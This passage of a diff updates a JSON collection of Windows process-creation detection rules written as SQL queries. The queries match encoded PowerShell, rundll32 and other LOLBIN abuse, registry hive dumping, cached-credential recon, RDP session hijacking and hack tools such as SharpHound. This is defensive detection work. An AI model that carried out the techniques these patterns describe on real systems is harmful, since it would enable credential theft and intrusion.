'\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": "proc_creation_win_wmic_process_creation.yml" }, { - "title": "PUA - Mouse Lock Execution", - "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", - "status": "test", - "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", - "author": "Cian Heasley", + "title": "Potential RDP Session Hijacking Activity", + "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "status": "experimental", + "description": "Detects potential RDP Session Hijacking activity on Windows systems", + "author": "@juju4", "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.execution" ], "falsepositives": [ - "Legitimate uses of Mouse Lock software" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" ], - "filename": "proc_creation_win_pua_mouselock_execution.yml" + "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "title": "Suspicious Rundll32 Activity", + "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_rundll32_susp_activity.yml" }, { - "title": "WinDbg/CDB LOLBIN Usage", - "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "title": "Certificate Exported Via Certutil.EXE", + "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", "status": "test", - "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", - "attack.t1218", - "attack.t1127" + "attack.t1027" ], "falsepositives": [ - "Legitimate use of debugging tools" + "There legitimate reasons to export certificates. Investigate the activity to determine if it's benign" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cdb.yml" + "filename": "proc_creation_win_certutil_export_pfx.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "title": "Permission Check Via Accesschk.EXE", + "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "status": "test", + "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "falsepositives": [ + "System administrator Usage" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" + }, + { + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Suspicious Git Clone", + "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", + "status": "experimental", + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.reconnaissance", + "attack.t1593.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_git_susp_clone.yml" }, { - "title": "Abusing Findstr for Defense Evasion", - "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", + "title": "Verclsid.exe Runs COM Object", + "id": "d06be4b9-8045-428b-a567-740a26d9db25", "status": "test", - "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", + "description": "Detects when verclsid.exe is used to run COM object via GUID", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1564.004", - "attack.t1552.001", - "attack.t1105" + "attack.t1218" ], "falsepositives": [ - "Administrative findstr usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR NewProcessName LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_findstr.yml" + "filename": "proc_creation_win_verclsid_runs_com.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects the use of SDelete to erase a file not the free space", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.impact", + "attack.t1485" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", - "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", - "author": "Florian Roth (Nextron Systems)", + "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", + "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "status": "experimental", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "DLL Loaded via CertOC.EXE", + "id": "242301bc-f92f-4476-8718-78004a6efd9f", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_vmnat.yml" + "filename": "proc_creation_win_certoc_load_dll.yml" }, { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" + "attack.t1003.005" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", - "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "status": "experimental", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", - "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' 